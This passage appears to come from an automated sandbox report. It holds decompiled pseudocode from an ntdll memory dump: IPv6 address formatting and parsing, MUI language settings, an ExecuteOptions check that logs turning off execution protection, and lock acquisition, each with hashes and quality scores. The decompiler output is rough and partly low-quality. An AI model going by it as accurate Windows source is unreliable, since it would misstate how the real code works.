                                                              							E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              							_v40 = _t318;
                                                              							_v20 = _t318;
                                                              						}
                                                              						if(_v8 != _t318) {
                                                              							E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              						}
                                                              						_v8 = _t318;
                                                              						goto L30;
                                                              					}
                                                              				}
                                                              				_t284 = _v24;
                                                              				_t322 = _t284 + 4;
                                                              				_push(_t284);
                                                              				_v48 = _t322;
                                                              				E01EE718A(_t284);
                                                              				_t339 = _t335 + 4;
                                                              				if(_t322 == _t318) {
                                                              					_v28 = _t318;
                                                              				} else {
                                                              					_v28 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              				}
                                                              				if(_v28 == _t318) {
                                                              					_v48 = _t318;
                                                              					goto L58;
                                                              				} else {
                                                              					E01EC2340(_v28, _v8, _v24);
                                                              					_v16 = _v28;
                                                              					_a4 = _t318;
                                                              					_t288 = E01EDE679(_v28, _t332);
                                                              					_t335 = _t339 + 0x14;
                                                              					while(1) {
                                                              						_v12 = _t288;
                                                              						if(_t288 == _t318) {
                                                              							break;
                                                              						}
                                                              						_v12 = _v12 + 2;
                                                              						 *_v12 = 0;
                                                              						E01ECE2A8(_v12,  &_v68, _v16);
                                                              						if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              						_v16 = _v12;
                                                              						_t288 = E01EDE679(_v12, _t332);
                                                              						_pop(_t322);
                                                              					}
                                                              					_t296 = _v16;
                                                              					if( *_v16 != _t318) {
                                                              						E01ECE2A8(_t322,  &_v68, _t296);
                                                              						if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              					}
                                                              					if(_a4 == _t318) {
                                                              						E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                              						_v48 = _t318;
                                                              						_v28 = _t318;
                                                              					}
                                                              					if(_v8 != _t318) {
                                                              						E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					}
                                                              					_v8 = _t318;
                                                              					goto L17;
                                                              				}
                                                              			}

                                                              0x01f31b44
                                                              0x01f31b44
                                                              0x01f31b4c
                                                              0x01f31b4f
                                                              0x01f31b55
                                                              0x01f31b55
                                                              0x01ee88a4
                                                              0x01ee88aa
                                                              0x01ee88b1
                                                              0x01ee88c5
                                                              0x01f31b5b
                                                              0x01f31b5b
                                                              0x01ee88c5
                                                              0x01ee88ce
                                                              0x01ee88e0
                                                              0x01ee88e5
                                                              0x01ee88e8
                                                              0x01ee88e8
                                                              0x01ee88ee
                                                              0x01ee8900
                                                              0x01ee8900
                                                              0x01ee8905
                                                              0x00000000
                                                              0x01ee8905

                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 01EE87C1
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 01EE8914
                                                              • Kernel-MUI-Language-Allowed, xrefs: 01EE8827
                                                              • Kernel-MUI-Number-Allowed, xrefs: 01EE87E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 01EE89FC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                                              • Instruction ID: a0f5be6b28e85195b8e95d3d624f143d5c3c81755f82805808aaedcedd336ae4
                                                              • Opcode Fuzzy Hash: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                                              • Instruction Fuzzy Hash: 74F1F4B2D0024AEFDF11DF98C984DEEBBF9FB08704F14546AE605A7210E7359A45DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 38%
                                                              			E01F013CB(intOrPtr* _a4, intOrPtr _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				intOrPtr _t71;
                                                              				signed int _t78;
                                                              				signed int _t86;
                                                              				char _t90;
                                                              				signed int _t91;
                                                              				signed int _t96;
                                                              				intOrPtr _t108;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				intOrPtr _t128;
                                                              				intOrPtr* _t129;
                                                              				void* _t130;
                                                              
                                                              				_t129 = _a4;
                                                              				_t128 = _a8;
                                                              				_t116 = 0;
                                                              				_t71 = _t128 + 0x5c;
                                                              				_v8 = 8;
                                                              				_v20 = _t71;
                                                              				if( *_t129 == 0) {
                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                              						goto L5;
                                                              					} else {
                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                              						if(_t96 != 0) {
                                                              							L38:
                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                              								goto L5;
                                                              							} else {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t86 = E01EF7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                              								L36:
                                                              								return _t128 + _t86 * 2;
                                                              							}
                                                              						}
                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                              						if(_t114 == 0) {
                                                              							L33:
                                                              							_t115 = 0x1ec2926;
                                                              							L35:
                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                              							_t86 = E01EF7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                              							goto L36;
                                                              						}
                                                              						if(_t114 != 0xffff) {
                                                              							_t116 = 0;
                                                              							goto L38;
                                                              						}
                                                              						if(_t114 != 0) {
                                                              							_t115 = 0x1ec9cac;
                                                              							goto L35;
                                                              						}
                                                              						goto L33;
                                                              					}
                                                              				} else {
                                                              					L5:
                                                              					_a8 = _t116;
                                                              					_a4 = _t116;
                                                              					_v12 = _t116;
                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                              							_v8 = 6;
                                                              						}
                                                              					}
                                                              					_t90 = _v8;
                                                              					if(_t90 <= _t116) {
                                                              						L11:
                                                              						if(_a8 - _a4 <= 1) {
                                                              							_a8 = _t116;
                                                              							_a4 = _t116;
                                                              						}
                                                              						_t91 = 0;
                                                              						if(_v8 <= _t116) {
                                                              							L22:
                                                              							if(_v8 < 8) {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t128 = _t128 + E01EF7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                              							}
                                                              							return _t128;
                                                              						} else {
                                                              							L14:
                                                              							L14:
                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                              									_push(":");
                                                              									_push(_t71 - _t128 >> 1);
                                                              									_push(_t128);
                                                              									_t128 = _t128 + E01EF7707() * 2;
                                                              									_t71 = _v20;
                                                              									_t130 = _t130 + 0xc;
                                                              								}
                                                              								_t78 = E01EF7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                              								_t130 = _t130 + 0x10;
                                                              							} else {
                                                              								_push(L"::");
                                                              								_push(_t71 - _t128 >> 1);
                                                              								_push(_t128);
                                                              								_t78 = E01EF7707();
                                                              								_t130 = _t130 + 0xc;
                                                              								_t91 = _a8 - 1;
                                                              							}
                                                              							_t91 = _t91 + 1;
                                                              							_t128 = _t128 + _t78 * 2;
                                                              							_t71 = _v20;
                                                              							if(_t91 >= _v8) {
                                                              								goto L22;
                                                              							}
                                                              							_t116 = 0;
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						_t108 = 1;
                                                              						_v16 = _t129;
                                                              						_v24 = _t90;
                                                              						do {
                                                              							if( *_v16 == _t116) {
                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                              									_a4 = _v12;
                                                              									_a8 = _t108;
                                                              								}
                                                              								_t116 = 0;
                                                              							} else {
                                                              								_v12 = _t108;
                                                              							}
                                                              							_v16 = _v16 + 2;
                                                              							_t108 = _t108 + 1;
                                                              							_t26 =  &_v24;
                                                              							 *_t26 = _v24 - 1;
                                                              						} while ( *_t26 != 0);
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              			}





















                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                                              • Instruction ID: 61b7411cf61414cc3c42ddff9974cb23f3aa1c35eb7363f0c02afab93d02142d
                                                              • Opcode Fuzzy Hash: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                                              • Instruction Fuzzy Hash: AF6135B5E04656EACB36CF5DC8808BFBBB5EF95300754C12EE59647581D332E640DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E01EF7EFD(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				char _v540;
                                                              				unsigned int _v544;
                                                              				signed int _v548;
                                                              				intOrPtr _v552;
                                                              				char _v556;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t33;
                                                              				void* _t38;
                                                              				unsigned int _t46;
                                                              				unsigned int _t47;
                                                              				unsigned int _t52;
                                                              				intOrPtr _t56;
                                                              				unsigned int _t62;
                                                              				void* _t69;
                                                              				void* _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t73;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              
                                                              				_t33 =  *0x1fa2088; // 0x745fb394
                                                              				_v8 = _t33 ^ _t73;
                                                              				_v548 = _v548 & 0x00000000;
                                                              				_t72 = _a4;
                                                              				if(E01EF7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                              					__eflags = _v548;
                                                              					if(_v548 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t62 = _t72 + 0x24;
                                                              					E01F13F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                              					_t71 = 0x214;
                                                              					_v544 = 0x214;
                                                              					E01ECDFC0( &_v540, 0, 0x214);
                                                              					_t75 = _t74 + 0x20;
                                                              					_t46 =  *0x1fa4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                              					__eflags = _t46;
                                                              					if(_t46 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t47 = _v544;
                                                              					__eflags = _t47;
                                                              					if(_t47 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					__eflags = _t47 - 0x214;
                                                              					if(_t47 >= 0x214) {
                                                              						goto L1;
                                                              					}
                                                              					_push(_t62);
                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                              					E01F13F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                              					_t52 = E01ED0D27( &_v540, L"Execute=1");
                                                              					_t76 = _t75 + 0x1c;
                                                              					_push(_t62);
                                                              					__eflags = _t52;
                                                              					if(_t52 == 0) {
                                                              						E01F13F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                              						_t71 =  &_v540;
                                                              						_t56 = _t73 + _v544 - 0x218;
                                                              						_t77 = _t76 + 0x14;
                                                              						_v552 = _t56;
                                                              						__eflags = _t71 - _t56;
                                                              						if(_t71 >= _t56) {
                                                              							goto L1;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              						while(1) {
                                                              							L10:
                                                              							_t62 = E01ED8375(_t71, 0x20);
                                                              							_pop(_t69);
                                                              							__eflags = _t62;
                                                              							if(__eflags != 0) {
                                                              								__eflags = 0;
                                                              								 *_t62 = 0;
                                                              							}
                                                              							E01F13F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                              							_t77 = _t77 + 0x10;
                                                              							E01F3E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                              							__eflags = _t62;
                                                              							if(_t62 == 0) {
                                                              								goto L1;
                                                              							}
                                                              							_t31 = _t62 + 2; // 0x2
                                                              							_t71 = _t31;
                                                              							__eflags = _t71 - _v552;
                                                              							if(_t71 >= _v552) {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              					}
                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                              					_push(3);
                                                              					_push(0x55);
                                                              					E01F13F92();
                                                              					_t38 = 1;
                                                              					L2:
                                                              					return E01ECE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                              				}
                                                              				L1:
                                                              				_t38 = 0;
                                                              				goto L2;
                                                              			}
                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F13F12
                                                              Strings
                                                              • ExecuteOptions, xrefs: 01F13F04
                                                              • Execute=1, xrefs: 01F13F5E
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F1E2FB
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F13F4A
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F13F75
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F13EC4
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F1E345
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                                              • Instruction ID: 8cf29383c0016d5f6cf89aaaeb7ed0af7e7e1a9562aba9427ceedf9b849bbbe6
                                                              • Opcode Fuzzy Hash: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                                              • Instruction Fuzzy Hash: CB41D972A4030D7ADB219B94DCC5FDF73BCAF58700F0404ADBB05E6085E7719A868BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E01F00B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				void* _t108;
                                                              				void* _t116;
                                                              				char _t120;
                                                              				short _t121;
                                                              				void* _t128;
                                                              				intOrPtr* _t130;
                                                              				char _t132;
                                                              				short _t133;
                                                              				intOrPtr _t141;
                                                              				signed int _t156;
                                                              				signed int _t174;
                                                              				intOrPtr _t177;
                                                              				intOrPtr* _t179;
                                                              				intOrPtr _t180;
                                                              				void* _t183;
                                                              
                                                              				_t179 = _a4;
                                                              				_t141 =  *_t179;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_v8 = 0;
                                                              				_v24 = 0;
                                                              				_v12 = 0;
                                                              				_v32 = 0;
                                                              				_v20 = 0;
                                                              				if(_t141 == 0) {
                                                              					L41:
                                                              					 *_a8 = _t179;
                                                              					_t180 = _v24;
                                                              					if(_t180 != 0) {
                                                              						if(_t180 != 3) {
                                                              							goto L6;
                                                              						}
                                                              						_v8 = _v8 + 1;
                                                              					}
                                                              					_t174 = _v32;
                                                              					if(_t174 == 0) {
                                                              						if(_v8 == 7) {
                                                              							goto L43;
                                                              						}
                                                              						goto L6;
                                                              					}
                                                              					L43:
                                                              					if(_v16 != 1) {
                                                              						if(_v16 != 2) {
                                                              							goto L6;
                                                              						}
                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              						L47:
                                                              						if(_t174 != 0) {
                                                              							E01ED8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                              							_t116 = 8;
                                                              							E01ECDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_t180 != 0) {
                                                              						if(_v12 > 3) {
                                                              							goto L6;
                                                              						}
                                                              						_t120 = E01F00CFA(_v28, 0, 0xa);
                                                              						_t183 = _t183 + 0xc;
                                                              						if(_t120 > 0xff) {
                                                              							goto L6;
                                                              						}
                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                              						goto L47;
                                                              					}
                                                              					if(_v12 > 4) {
                                                              						goto L6;
                                                              					}
                                                              					_t121 = E01F00CFA(_v28, _t180, 0x10);
                                                              					_t183 = _t183 + 0xc;
                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                              					goto L47;
                                                              				} else {
                                                              					while(1) {
                                                              						_t123 = _v16;
                                                              						if(_t123 == 0) {
                                                              							goto L7;
                                                              						}
                                                              						_t108 = _t123 - 1;
                                                              						if(_t108 != 0) {
                                                              							goto L1;
                                                              						}
                                                              						_t178 = _t141;
                                                              						if(E01F006BA(_t108, _t141) == 0 || _t135 == 0) {
                                                              							if(E01F006BA(_t135, _t178) == 0 || E01F00A5B(_t136, _t178) == 0) {
                                                              								if(_t141 != 0x3a) {
                                                              									if(_t141 == 0x2e) {
                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                              											goto L41;
                                                              										} else {
                                                              											_v24 = _v24 + 1;
                                                              											L27:
                                                              											_v16 = _v16 & 0x00000000;
                                                              											L28:
                                                              											if(_v28 == 0) {
                                                              												goto L20;
                                                              											}
                                                              											_t177 = _v24;
                                                              											if(_t177 != 0) {
                                                              												if(_v12 > 3) {
                                                              													L6:
                                                              													return 0xc000000d;
                                                              												}
                                                              												_t132 = E01F00CFA(_v28, 0, 0xa);
                                                              												_t183 = _t183 + 0xc;
                                                              												if(_t132 > 0xff) {
                                                              													goto L6;
                                                              												}
                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                              												goto L20;
                                                              											}
                                                              											if(_v12 > 4) {
                                                              												goto L6;
                                                              											}
                                                              											_t133 = E01F00CFA(_v28, 0, 0x10);
                                                              											_t183 = _t183 + 0xc;
                                                              											_v20 = _v20 + 1;
                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                              											goto L20;
                                                              										}
                                                              									}
                                                              									goto L41;
                                                              								}
                                                              								if(_v24 > 0 || _v8 > 6) {
                                                              									goto L41;
                                                              								} else {
                                                              									_t130 = _t179 + 1;
                                                              									if( *_t130 == _t141) {
                                                              										if(_v32 != 0) {
                                                              											goto L41;
                                                              										}
                                                              										_v32 = _v8 + 1;
                                                              										_t156 = 2;
                                                              										_v8 = _v8 + _t156;
                                                              										L34:
                                                              										_t179 = _t130;
                                                              										_v16 = _t156;
                                                              										goto L28;
                                                              									}
                                                              									_v8 = _v8 + 1;
                                                              									goto L27;
                                                              								}
                                                              							} else {
                                                              								_v12 = _v12 + 1;
                                                              								if(_v24 > 0) {
                                                              									goto L41;
                                                              								}
                                                              								_a7 = 1;
                                                              								goto L20;
                                                              							}
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							L20:
                                                              							_t179 = _t179 + 1;
                                                              							_t141 =  *_t179;
                                                              							if(_t141 == 0) {
                                                              								goto L41;
                                                              							}
                                                              							continue;
                                                              						}
                                                              						L7:
                                                              						if(_t141 == 0x3a) {
                                                              							if(_v24 > 0 || _v8 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t130 = _t179 + 1;
                                                              								if( *_t130 != _t141) {
                                                              									goto L41;
                                                              								}
                                                              								_v20 = _v20 + 1;
                                                              								_t156 = 2;
                                                              								_v32 = 1;
                                                              								_v8 = _t156;
                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              								goto L34;
                                                              							}
                                                              						}
                                                              						L8:
                                                              						if(_v8 > 7) {
                                                              							goto L41;
                                                              						}
                                                              						_t142 = _t141;
                                                              						if(E01F006BA(_t123, _t141) == 0 || _t124 == 0) {
                                                              							if(E01F006BA(_t124, _t142) == 0 || E01F00A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t128 = 1;
                                                              								_a7 = 1;
                                                              								_v28 = _t179;
                                                              								_v16 = 1;
                                                              								_v12 = 1;
                                                              								L39:
                                                              								if(_v16 == _t128) {
                                                              									goto L20;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              						} else {
                                                              							_a7 = 0;
                                                              							_v28 = _t179;
                                                              							_v16 = 1;
                                                              							_v12 = 1;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              				}
                                                              				L1:
                                                              				_t123 = _t108 == 1;
                                                              				if(_t108 == 1) {
                                                              					goto L8;
                                                              				}
                                                              				_t128 = 1;
                                                              				goto L39;
                                                              			}


























                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: 4c98f179a8272ff31137eafa3be1d57833a8c16a37f499a982a1463abc4aae5d
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 32A18071D0070ADADF26CF58C8457BEBBB5AF05384F24846AF942A72C1DE325681EB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 50%
                                                              			E01F00554(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int* _t49;
                                                              				signed int _t51;
                                                              				signed int _t56;
                                                              				signed int _t58;
                                                              				signed int _t61;
                                                              				signed int _t63;
                                                              				void* _t66;
                                                              				intOrPtr _t67;
                                                              				void* _t69;
                                                              				signed int _t70;
                                                              				void* _t75;
                                                              				signed int _t81;
                                                              				signed int _t84;
                                                              				void* _t86;
                                                              				signed int _t93;
                                                              				signed int _t96;
                                                              				intOrPtr _t105;
                                                              				signed int _t107;
                                                              				void* _t110;
                                                              				signed int _t115;
                                                              				signed int* _t119;
                                                              				void* _t125;
                                                              				void* _t126;
                                                              				signed int _t128;
                                                              				signed int _t130;
                                                              				signed int _t138;
                                                              				signed int _t144;
                                                              				void* _t158;
                                                              				void* _t159;
                                                              				void* _t160;
                                                              
                                                              				_t96 = _a4;
                                                              				_t115 =  *(_t96 + 0x28);
                                                              				_push(_t138);
                                                              				if(_t115 < 0) {
                                                              					_t105 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                              						goto L6;
                                                              					} else {
                                                              						__eflags = _t115 | 0xffffffff;
                                                              						asm("lock xadd [eax], edx");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L6:
                                                              					_push(_t128);
                                                              					while(1) {
                                                              						L7:
                                                              						__eflags = _t115;
                                                              						if(_t115 >= 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              							_t49 = _t96 + 0x1c;
                                                              							_t106 = 1;
                                                              							asm("lock xadd [edx], ecx");
                                                              							_t115 =  *(_t96 + 0x28);
                                                              							__eflags = _t115;
                                                              							if(_t115 < 0) {
                                                              								L23:
                                                              								_t130 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01fa01c0;
                                                              									_push(_t144);
                                                              									_push(0);
                                                              									_t51 = E01EBF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                              									__eflags = _t51 - 0x102;
                                                              									if(_t51 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t106 =  *(_t144 + 4);
                                                              									_t126 =  *_t144;
                                                              									_t86 = E01F04FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                              									_push(_t126);
                                                              									_push(_t86);
                                                              									E01F13F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                              									E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              									_t130 = _t130 + 1;
